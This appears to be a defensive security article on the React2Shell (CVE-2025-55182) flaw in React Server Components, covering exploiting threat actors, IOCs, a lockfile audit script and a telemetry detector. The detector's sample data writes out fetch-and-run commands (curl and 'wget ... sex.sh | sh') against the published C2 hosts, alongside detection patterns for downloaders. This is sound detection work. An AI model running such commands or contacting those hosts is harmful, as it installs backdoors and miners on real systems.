The CVE-2025-55182 "React2Shell" flaw in React Server Components exposed thousands of Next.js sites to unauthenticated remote code execution. Within days, China-nexus espionage groups, cryptocurrency miners, and other threat actors were deploying a suite of backdoors (MINOCAT, SNOWLIGHT, COMPOOD, HISONIC, and ANGRYREBEL.LINUX), turning the web framework into a launchpad for espionage and cryptocurrency mining.
React2Shell Exposed: How a Single RCE in React Server Components Became a Global Threat Actor Playground

On December 3, 2025, a critical unauthenticated remote code execution (RCE) vulnerability, CVE‑2025‑55182, was publicly disclosed in React Server Components (RSC). The flaw, dubbed React2Shell, allows an attacker to send a single crafted HTTP request that executes arbitrary code with the privileges of the web server process. With a CVSS v3.x score of 10.0 and a CVSS v4 score of 9.3, the vulnerability quickly became a high‑profile target for a spectrum of threat actors.
"CVE‑2025‑55182 is an unauthenticated RCE vulnerability in React Server Components with a CVSS v3.x score of 10.0 and a CVSS v4 score of 9.3…" – Google Threat Intelligence Group
The Vulnerable Packages
The flaw affects three RSC packages, one per bundler integration:

| Package | Affected versions |
|---|---|
| react-server-dom-webpack | 19.0 through 19.2.0 |
| react-server-dom-parcel | 19.0 through 19.2.0 |
| react-server-dom-turbopack | 19.0 through 19.2.0 |

Upgrading to 19.0.1, 19.1.2, or 19.2.1 (or newer on the respective release line) removes the RCE vector. The same releases also fix the information-disclosure bug CVE-2025-55183.
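The following is an added example for this article, not code from React, Next.js, GTIG or Google, and it doubles as a concrete form of the "audit dependencies" advice given later. It is a Python audit that reads an npm package-lock.json (the lockfile v2/v3 "packages" layout is assumed), finds every installed copy of the three RSC packages, including nested transitive copies that a top-level `npm ls` would hide, and reports whether each version falls inside the affected range using the fixed versions listed above. The sample lockfile embedded in it is constructed for illustration.

```python
"""Audit an npm lockfile for React Server Components builds affected by
CVE-2025-55182 (React2Shell).

Added example for this article; not code from React, Next.js, GTIG or Google.
Assumes the npm lockfile v2/v3 layout: a top-level "packages" object keyed by
the node_modules path of each installed package. Affected range and fixed
versions are those stated in the article (19.0 through 19.2.0 affected;
19.0.1 / 19.1.2 / 19.2.1 fixed).
"""
import json
import re

AFFECTED_PACKAGES = {
    "react-server-dom-webpack",
    "react-server-dom-parcel",
    "react-server-dom-turbopack",
}

# First patched release on each 19.x line.
FIXED_BY_MINOR = {
    (19, 0): (19, 0, 1),
    (19, 1): (19, 1, 2),
    (19, 2): (19, 2, 1),
}


def parse_version(version):
    """Return (major, minor, patch); a pre-release/build suffix such as
    19.2.0-canary-abc123 is ignored, so it compares as 19.2.0."""
    m = re.match(r"(\d+)\.(\d+)\.(\d+)", version)
    if not m:
        raise ValueError(f"unrecognised version string: {version!r}")
    return tuple(int(part) for part in m.groups())


def is_vulnerable(version):
    """True if a react-server-dom-* version lies in the affected range."""
    v = parse_version(version)
    fixed = FIXED_BY_MINOR.get(v[:2])
    # Lines outside the table (pre-19 releases, or minors newer than 19.2)
    # are outside the published affected range.
    return fixed is not None and v < fixed


def audit_lockfile(lock_text):
    """Parse lockfile JSON text; return one (path, name, version, vulnerable)
    tuple per installed copy of an affected package, nested copies included."""
    lock = json.loads(lock_text)
    findings = []
    for path, entry in lock.get("packages", {}).items():
        # Keys look like "node_modules/react-server-dom-webpack" or, for a
        # nested copy, "node_modules/<dep>/node_modules/react-server-dom-webpack".
        # Aliased installs carry an explicit "name"; otherwise use the path.
        name = entry.get("name") or path.rsplit("node_modules/", 1)[-1]
        version = entry.get("version")
        if name in AFFECTED_PACKAGES and version:
            findings.append((path, name, version, is_vulnerable(version)))
    return findings


# Constructed sample lockfile: one patched copy, one vulnerable top-level copy
# and one vulnerable nested copy pulled in by another dependency.
SAMPLE_LOCK = json.dumps({
    "name": "shop-frontend",
    "lockfileVersion": 3,
    "packages": {
        "": {"name": "shop-frontend", "version": "1.0.0"},
        "node_modules/react": {"version": "19.2.0"},
        "node_modules/react-server-dom-turbopack": {"version": "19.1.2"},
        "node_modules/react-server-dom-webpack": {"version": "19.2.0"},
        "node_modules/legacy-admin/node_modules/react-server-dom-parcel": {
            "version": "19.0.0"
        },
    },
})


if __name__ == "__main__":
    for path, name, version, vulnerable in audit_lockfile(SAMPLE_LOCK):
        status = "VULNERABLE" if vulnerable else "ok"
        print(f"{status:10} {name}@{version}  ({path})")
```

Run it against each application's real lockfile (`audit_lockfile(open("package-lock.json").read())`); the nested-copy case is the one that matters most, because a single `npm update` of the top-level package leaves a vulnerable copy under another dependency untouched.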
Exploitation Landscape
Within days of disclosure, the Google Threat Intelligence Group (GTIG) observed a flurry of exploitation activity across multiple regions and industries. The attackers employed a variety of payloads and post‑compromise behaviors, underscoring the breadth of the threat.
China-Nexus Espionage Clusters
| Actor | Payload | Post-Exploitation | Targeted Infrastructure |
|---|---|---|---|
| Earth Lamia (UNC5454) | MINOCAT tunneler | Creates hidden directory $HOME/.systemd-utils, kills ntpclient, installs cron and systemd services, and injects shell-config hooks | AWS, Alibaba Cloud (APAC) |
| Jackpot Panda | SNOWLIGHT downloader | Uses curl/wget to fetch a Go-based backdoor, then contacts C2 reactcdn.windowserrorapis[.]com | Global |
| UNC6588 | COMPOOD backdoor (masquerades as Vim) | Executes via wget; minimal follow-on activity | Global |
| UNC6603 | HISONIC backdoor | Uses Cloudflare Pages and GitLab for config retrieval; XOR-encoded payload markers | AWS, Alibaba Cloud |
| UNC6595 | ANGRYREBEL.LINUX | Installs as sshd in /etc/, timestomps, clears shell history | International VPS |
"The threat actor retrieved and executed a bash script used to create a hidden directory…" – GTIG
Financially Motivated Actors
Cryptocurrency miners were among the first to leverage the vulnerability. Starting December 5, GTIG documented the deployment of XMRig miners via a shell script (sex.sh) that also attempted to persist the miner as a systemd service.
Why This Matters
React and Next.js are ubiquitous in modern web stacks, powering everything from e‑commerce sites to enterprise intranets. The sheer number of exposed systems—combined with the ease of exploitation (no authentication required)—means that a single vulnerability can cascade into a global compromise.
Moreover, the rapid appearance of further React CVEs after the initial disclosure (CVE-2025-55183, CVE-2025-55184 and CVE-2025-67779) illustrates how a high-visibility flaw draws scrutiny to the surrounding code, prompting researchers and attackers alike to probe for related weaknesses.
Defensive Recommendations
- Patch Immediately – Upgrade every react-server-dom-* package to at least 19.0.1 / 19.1.2 / 19.2.1 on its release line; to pick up the later DoS mitigations as well, move to 19.2.3.
- Deploy WAF Rules – Google Cloud Armor now offers a rule that detects and blocks exploitation attempts. Treat it as a stopgap while patching, not a replacement for the upgrade.
- Audit Dependencies – Check the lockfile of every application, including nested copies pulled in transitively, for vulnerable RSC packages.
- Monitor Network Traffic – Look for outbound wget/curl commands launched from web server processes, especially to domains like reactcdn.windowserrorapis[.]com.
- Hunt for Compromise – Search for hidden directories ($HOME/.systemd-utils), terminated ntpclient processes, and altered shell configuration files.
Indicators of Compromise
| Indicator | Type | Description |
|---|---|---|
| reactcdn.windowserrorapis[.]com | Domain | SNOWLIGHT C2 and staging server |
| 82.163.22.139 | IP | SNOWLIGHT C2 |
| 216.158.232.43 | IP | Staging server for sex.sh |
| 45.76.155.14 | IP | COMPOOD C2 |
| SHA256 hashes of known samples (MINOCAT, COMPOOD, HISONIC, ANGRYREBEL, XMRig) | SHA256 | Sample binaries (hash values not reproduced here) |
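To make the monitoring and hunting recommendations concrete, here is an added example, not GTIG's or Google's tooling and not code from the original report: a small Python detector run over constructed process-start events in a simplified JSON-lines format. It keeps the published indicators defanged and refangs them only for matching, flags curl/wget spawned directly from a node process (the privilege context the RCE runs in), and flags the MINOCAT hidden directory, the ntpclient kill and the sex.sh stager. The event field names, the web-server process names and the sample lines are assumptions for illustration; map your EDR or auditd execve fields onto them.

```python
"""Flag React2Shell post-exploitation activity in process-start telemetry.

Added example for this article; it is not GTIG's or Google's tooling. It
assumes a simplified JSON-lines event format (one process start per line with
"parent", "user" and "cmdline" fields) constructed here for illustration; map
your EDR or auditd execve fields onto it. The indicators are the ones the
article lists: the SNOWLIGHT domain and IPs, the COMPOOD C2 IP, the sex.sh
miner stager, the MINOCAT hidden directory and the ntpclient kill.
"""
import json
import re

# Network indicators from the article, kept defanged as published and
# refanged only for matching.
DEFANGED_IOCS = [
    "reactcdn.windowserrorapis[.]com",
    "82.163.22.139",
    "216.158.232.43",
    "45.76.155.14",
]
IOC_PATTERNS = [
    # Boundaries stop 45.76.155.14 from matching inside 45.76.155.140.
    re.compile(r"(?<![\w.])" + re.escape(ioc.replace("[.]", ".")) + r"(?![\w.])")
    for ioc in DEFANGED_IOCS
]

# Process names a Next.js / RSC server commonly runs under (assumed; adjust to
# your platform). The exploit runs with that process's privileges, so a
# downloader spawned directly from it is the pattern the article describes.
WEB_SERVER_PARENTS = {"node", "next-server"}
DOWNLOADER = re.compile(r"\b(curl|wget)\b")

# Host artefacts from the article.
ARTEFACTS = [
    (re.compile(r"\.systemd-utils\b"), "MINOCAT hidden directory $HOME/.systemd-utils"),
    (re.compile(r"\bsex\.sh\b"), "XMRig stager script sex.sh"),
    (re.compile(r"\b(kill|pkill|killall)\b[^;&|]*\bntpclient\b"),
     "ntpclient terminated (MINOCAT behaviour)"),
]


def classify(event):
    """Return (severity, reason) pairs for one process-start event."""
    cmd = event.get("cmdline", "")
    parent = event.get("parent", "")
    hits = []
    for pattern in IOC_PATTERNS:
        m = pattern.search(cmd)
        if m:
            hits.append(("high", f"known React2Shell infrastructure {m.group(0)}"))
    tool = DOWNLOADER.search(cmd)
    if parent in WEB_SERVER_PARENTS and tool:
        hits.append(("medium", f"{tool.group(0)} spawned by web server process {parent}"))
    for pattern, description in ARTEFACTS:
        if pattern.search(cmd):
            hits.append(("medium", description))
    return hits


def scan_events(lines):
    """Scan JSON-lines telemetry; return [(line_no, severity, reason), ...]."""
    alerts = []
    for line_no, line in enumerate(lines, start=1):
        if not line.strip():
            continue
        for severity, reason in classify(json.loads(line)):
            alerts.append((line_no, severity, reason))
    return alerts


# Constructed sample telemetry: two exploitation follow-ons, two persistence
# artefacts, and two benign events that must not alert.
SAMPLE_TELEMETRY = """\
{"parent": "node", "user": "www-data", "cmdline": "sh -c 'curl -fsSL http://reactcdn.windowserrorapis.com/s -o /tmp/.s && chmod +x /tmp/.s && /tmp/.s'"}
{"parent": "node", "user": "www-data", "cmdline": "wget -qO- http://216.158.232.43/sex.sh | sh"}
{"parent": "bash", "user": "www-data", "cmdline": "mkdir -p /home/www-data/.systemd-utils"}
{"parent": "bash", "user": "www-data", "cmdline": "pkill -9 ntpclient"}
{"parent": "cron", "user": "root", "cmdline": "curl -s https://metrics.internal.example/health"}
{"parent": "node", "user": "www-data", "cmdline": "sh -c 'npm run build'"}
"""


if __name__ == "__main__":
    for line_no, severity, reason in scan_events(SAMPLE_TELEMETRY.splitlines()):
        print(f"line {line_no}: [{severity}] {reason}")
```

The infrastructure matches are high severity because a hit on published C2 is rarely benign; the parent-process rule is medium because build pipelines do occasionally fetch with curl from node, so it needs the web-server user and the command context before escalation. Expect the published indicators to rotate quickly; the behavioural rules (web server spawning a downloader, hidden directory under the service account's home) age better than the domain and IP list.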
"Google has rolled out a Cloud Armor web application firewall (WAF) rule designed to detect and block exploitation attempts related to this vulnerability." – GTIG
Closing Thoughts
The React2Shell saga demonstrates how a flaw in a widely used open‑source library can be weaponized by both espionage and financially motivated actors at scale. Developers and security teams must treat such vulnerabilities not as isolated incidents but as a call to action: enforce rapid patching, monitor for subtle persistence mechanisms, and maintain a vigilant posture against the evolving threat landscape.
Source: Google Threat Intelligence Group – Threat Actors Exploit React2Shell (CVE‑2025‑55182)

